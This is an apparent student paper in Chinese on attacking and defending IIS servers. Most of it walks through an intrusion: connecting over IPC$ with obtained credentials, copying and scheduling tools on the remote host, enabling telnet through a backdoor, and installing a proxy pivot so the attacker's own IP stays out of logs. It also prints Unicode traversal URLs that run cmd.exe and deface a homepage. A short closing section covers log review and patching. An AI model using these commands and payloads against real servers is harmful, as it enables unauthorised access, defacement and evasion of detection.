网络攻防论文.docx

网络攻防论文.docx

《网络攻防论文.docx》由会员分享，可在线阅读，更多相关《网络攻防论文.docx（14页珍藏版）》请在冰豆网上搜索。

网络攻防论文

网络攻击与防御技术

——IIS服务器攻防

姓名：

XXXX

学号：

201011010122

老师：

申浩如

日期：

2013.6.29

信息技术学院

目录

1．入侵IIS服务器的准备工作1

1.1黑客入侵IIS服务器的流程1

1.2制作代理跳板1

1.2.1利用已知用户名和密码建立连接2

1.2.2拷贝文件到远程主机2

1.2.3取得远程主机的本地时间2

1.2.4建立任务2

1.2.5查看任务2

1.2.6启动远程主机的telnet服务2

1.2.7登录主机3

1.2.8设置代理3

1.2.9退出目标主机4

1.2.10使用代理4

2.攻防实例：

Unicode漏洞攻防6

2.1使用扫描软件查找Unicode漏洞6

2.1.1使用流光软件6

2.1.2利用Unicode漏洞简单修改目标主页的攻击9

2.2.Unicode漏洞解决方案11

1．入侵IIS服务器的准备工作

进入IIS服务器将其网页换掉是很多黑客初学者的目标，也是黑客技术学习中重要的一课。

但是，一般的网站服务器都有专业的网管人员在管理，而且也加装了各种软件或硬件的防火墙，因此相对于入侵一般单纯的上网电脑肯定会难得多，在本节中我们将讲解入侵网站服务器的流程。

另外网管人员不同于一般的菜鸟，所以我们在入侵时还需要很好地保护自己，所以需要制作代理跳板，以便隐藏自己身份，否则弄得一个“出师未捷身先死”，那就太不值得了。

1.1黑客入侵IIS服务器的流程

一般来说，没有多大恶意的黑客入侵网站最多是为了炫耀自己，主要体现在更换别人的主页。

根据入侵的难易程度和成功率的高低，建议大家在入侵时采用以下的流程，如图1-1所示。

例如在黑客入侵流程中，通过端口139进入共享磁盘和默认共享漏洞（IPC$）入侵，虽然这两种方法听起来有些离谱，但是的的确确有这种没有太强安全意识、或者是太懒的管理员，将139的门户大开，而且还没有设置权限限制。

1.2制作代理跳板

要使一台网络主机成为自己的代理服务器，首先必须通过其他方式（如流光弱口令扫描）得到这台机器的用户名和密码，然后利用已知的用户名和密码与远程主机建立连接。

然后为远程主机启动telnet服务，以便登录到远程主机进行操作，能够登录远程主机后，就可以在它上面安装和设置代理服务器了，下面的操作以连接IP地址为10.0.13.19这台远程主机为例。

1.2.1利用已知用户名和密码建立连接

在命令提示符下，执行命令，使用已有的用户名和密码建立与目标主机的连接，命令如下：

netuse\\10.0.13.19\ipc$密码/user:

用户名如图1-2所示。

1.2.2拷贝文件到远程主机

利用建立的连接，将事先准备好的存放在当前目录下的ntlm.exe和sksockserver.exe复制到远程主机的system32目录里，命令为：

copyntlm.exe\\10.0.13.19\admin$\system32

copysksockserver.exe\\10.0.13.19\admin$\system32

ntlm.exe程序可以在流光安装目录下的tools目录里找，这是一个专门关闭远程主机NTLM验证的程序，另外，还需要在同一个目录里找到netsvc.exe程序，这是一个专门打开远程主机服务的后门程序,在稍后将用它打开远程主机的telnet服务，使用telnet登录远程主机时会要求进行NTLM验证，可能导致telnet连接不上，所以需要先运行这个专门的程序将Windows的NTLM验证程序关闭。

1.2.3取得远程主机的本地时间

输入：

nettime\\10.0.13.19，这样我们就得到了远程主机的本地时间。

1.2.4建立任务

输入：

at\\10.0.13.1911:

17ntlm.exe，使目标主机在两分钟后运行ntlm.exe程序。

1.2.5查看任务

输入：

at\\10.0.13.19命令，可以查看任务是否在列表中，如果没有了，说明任务已经执行。

1.2.6启动远程主机的telnet服务

输入：

netsvctelnet\\10.0.13.19/start,如图7-1-5所示，其中10.0.13.19是远程主机的IP地址。

1.2.7登录主机

远程主机的telnet服务开启之后，我们就可以利用telnet命令登录远程主机了，输入命令：

telnet10.0.13.19,出现如图所示的确认是否要发送密码界面。

再键入“Y”，出现用户登录验证界面，如图所示。

输入正确的用户名和密码后回车，就可成功登录到远程主机了，如图所示。

1.2.8设置代理

登录主机后，接下来需要设置代理，这里使用Sksockserver.exe软件为例来作为代理软件。

Sksockserver.exe软件体积小，只有几十K，使用简单，支持多跳板之间的连续跳，而且各跳板之间传输的数据是动态加密的，这样，就算你在hacking过程中被网管发现，他用sniffer截到的也仅仅是堆乱码，查不到真实的IP地址。

在第1.2.2步我们已经将Sksockserver.exe文件复制到远程主机的C:

\winnt\system32目录，现在可以直接运行命令进行安装：

sksockserver–install,安装sksockserver,如图所示。

接下来再指定该程序打开的端口，提定端口的参数为-configport，可以用任何空闲的端口，输入命令：

sksockserver–configport1213，如图所示。

如果不进行端口设置，则使用的是默认端口1813。

接着使用–configstarttype参数指定程序的启动方式，输入命令：

sksockserver–configstarttype2，如图所示。

值为2表示自动启动，这样就不怕目标服务器重新启动系统后，跳板会停止运行。

所有的都设置完成以后，就可以启动服务了，服务的名称为：

skserver，如图所示。

1.2.9退出目标主机

服务启动后，跳板服务器就全部设置完成了，现在可以输入：

exit，断开与目标主机的连接。

再输入：

netuse\\10.0.13.19\ipc$/delete,删除此前建立的IPC连接。

1.2.10使用代理

在本地计算机上打开代理程序，这里以sockscap为例，进入其主界面，如图所示，点击“new”按钮，添加需要使用代理服务器的程序，当然你也可以将要运行的其它网络程序拖到sockscap里来。

最后再点击主菜单上的“文件”|“设置”，进入其设置界面，如图所示进行设置。

然后从Sockscap里打开IE、QQ、流光、CMD命令等进行操作。

这时你进行的任何操作，别人都会认为是代理主机进行的操作。

如此一来，在目标服务器中所留下的各种记录（如IISLog）就是跳板电脑的IP而不是你的IP地址，呵呵，现在你可以在网络上隐身了。

2.攻防实例：

Unicode漏洞攻防

在Unicode字符解码时，IIS存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。

当用户用IIS打开文件时，如果该文件名包含Unicode字符，系统会对其进行解码。

如果用户提供一些特殊的编码，将导致IIS错误地打开或者执行某些Web根目录以外的文件。

XX的用户可能会利用IUSR_machinename账号的上下文空间访问任何已知的文件。

该账号在默认情况下属于Everyone和Users组的成员，因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都可能被删除、修改或执行。

通过此漏洞，我们可查看文件内容、建立文件夹、删除文件、拷贝文件且改名、显示目标主机当前的环境变量、把某个文件夹内的全部文件一次性拷贝到另外的文件夹去、把某个文件夹移动到指定的目录和显示某一路径下相同文件类型的文件内容等等。

Unicode是如今最热门的漏洞之一，也是经常被黑客们利用的漏洞之一，我们了解黑客是怎样利用该漏洞进行入侵的，然后通过对这种黑客手段的了解，找到防御方法进行有效的防御。

2.1使用扫描软件查找Unicode漏洞

通过扫描器，可以发现目标服务器是否有Unicode漏洞，能找出有Unicode漏洞的网站服务器，然后就可以采用一些手段入侵目标主机了。

网上这类扫描工具很多，下面以流光和RangeScan这两个工具为例介绍如何找到Unicode漏洞主机的。

2.1.1使用流光软件

安装运行流光后，出现流光的使用界面，如图所示。

选择“探测”|“高级扫描”，出现如图所示的界面。

选择“反向”，再选中“检测项目”中的“IIS”，如图所示。

将上面的“起始地址”和“结束地址”填上，在目标系统中选择“WindowsNT”，确定之后进入“高级扫描设置”，选择进入“IIS”标签，选择“Unicode编码漏洞”复选框，其他不选，如图所示。

然后再切换到“选项”标签，选择猜解用户名词典、密码词典、保存报告的路径和文件名、并发线程数（如果没有特殊要求，这些都可以采用默认值）。

最后点击“确定”按钮，开始进行扫描，如图所示。

过一会儿，就会在主界面的中部列出有Unicode编码漏洞的肉机。

2.1.2利用Unicode漏洞简单修改目标主页的攻击

假设该主机的IP地址为61.52.142.40，其图列出存在漏洞的主机的IP存在漏洞的内容表示为：

/scripts/..%255c..%255cwinnt/system32/cmd.exe，这时候，如果黑客在打开的IE浏览器的地址栏中输入：

http:

//61.52.142.40/scripts/..%255c..%255cwinnt/system32/cmd.exe?

/c+dir，就可以看到如图所示的IP地址是61.52.142.40的计算机中关于网页内容的Scripts文件夹中的文件了。

在证实了某主机存在漏洞后，我们就可以修改目标主机的Web文件了，常用的方法是利用echo回显以及管道工具“>”和“>>”。

如在IE的地址栏中输入：

http:

//61.52.142.40/scripts/..%255c..%255cwinnt/system32/cmd.exe?

/c+dir+d:

\inetpub\

然后回车，我们就可以看到如图所示的D盘下的inetpub文件夹了，并且在inetpub文件夹下还存在wwwroot子文件夹。

接下来还可使用命令：

http:

//X.X.X.X/scripts/..%c0%af../winnt/system32/cmd.exe?

/c+dir+d:

\inetpub\wwwroot，如图所示。

这样，就可以看到存放主页的目录（在这里是d:

\inetpub\wwwroot）里面的文件了，里面一般会有default.asp，default.htm，index.asp，index.htm等文件，这些是默认的主页文件，当然每台机器的管理员设置的都会有所不同，具体情况应该具体分析。

在找到对方服务器上Web页面所在的目录后，就要判断一下自己是否有权修改对方的网页文件。

首先要确定文件是否可读写，用下面的命令来判断（假设主页文件存放路径为d:

\inetpub\wwwroot\index.asp）：

http:

//61.52.142.242/scripts/..%c0%af../winnt/system32/attrib.exe?

%20-r%20-h%20d:

\inetpub\wwwroot\index.asp

①这时候如果出现下面的英文信息：

CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.The

headersitdidreturnare:

表明这时候就可以修改对方的网页了。

②这时候如果出现下面的英文信息：

CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.The

headersitdidreturnare:

Accessdenied-d:

\inetpub\wwwroot\index.asp

表明目前的权限还不够，最好还是选择放弃吧！

如果我们运气比较好，找到了可以修改的主页文件，假设是目标主机下的d:

\inetpub\wwwroot\default.asp

这个文件，那么，就可以在IE浏览器的地址栏中输入这样的命令：

http:

//61.52.X.X/scripts/..%c1%1c../winnt/system32/cmd.exe?

/c+echo+I+love+my+homeland+>d:

\inetpub\wwwroot\default.asp

此时再看这个首页，已经被修改为：

“Ilovemyhomeland”，如图所示。

至此，一个简单的黑客行为就发生并实现了！

如果仅仅只是简单地修改页面信息是远远不会满足某些黑客的欲望，黑客们的目标往往是完全操纵该台计算机。

黑客们往往也是利用Unicode漏洞操作目标主机，在这里就不做研究了。

2.2.Unicode漏洞解决方案

如果有人利用Unicode漏洞进入目标主机，并执行过Ftp命令，例如到某个Ftp站点下载过文件，都会在日志中被记录下来，不要以为他删除那个文件或给文件改名就可以逃脱入侵的证据了。

在目标主机的winnt/sys-

tem32/logfiles\msftpsvc1目录下，可以找到运行Ftp的日志，如果有人执行过Ftp命令，在日志文件里可以看到类似下面的记录（其中127.0.0.1为日志中记载的入侵者的IP）：

11:

49:

19127.0.0.1[2]USERxiaorong331

11:

49:

19127.0.0.1[2]PASS–230

11:

49:

19127.0.0.1[2]sent/lucky.txt226

11:

49:

19127.0.0.1[2]QUIT-226

这样你就可以通过这个记录来发现他的IP，再来抓住他。

另外，在winnt\system32\logfiles\w3svc1\目录里保留有web访问记录，如果曾经被人利用Unicode漏洞访问过，可以在日志里看到类似下面的记录（其中127.0.0.1为日志中记载的入侵者的IP）：

11:

36:

18127.0.0.1GET/scripts/..\../winnt/system32/cmd".exe401

11:

36:

18127.0.0.1GET/scripts/..\../winnt/system32/cmd".exe200

如果有人曾经执行过copy、del、echo、bat等具有入侵行为的命令时，会有如下记录：

11:

37:

27127.0.0.1GET/scripts/..\../winnt/system32/cmd".exe401

11:

37:

27127.0.0.1GET/scripts/..\../winnt/system32/cmd".exe502

是不是一清二楚呢？

不过狡猾的黑客（高手）还是会有其它应对方法的，但是经常查看日志文件，却是有百利而无一害哦！

只用上面的方法太被动了，还是主动些先解决了Unicode漏洞为好，下面为你提供了两种方案：

2.2.1简单解决方案

①限制网络用户访问和调用cmd的权限。

②在Scripts、Msadc目录没必要使用的情况下，删除该文件夹或者改名。

③安装系统时不要使用默认路径，比如可以改名为其他名字。

2.2.2最好的解决办法

最好的方法当然是实时下载微软提供的IIS补丁了。

当然，因为很多漏洞连微软自己都没发现，所以还是安个360安全卫士吧！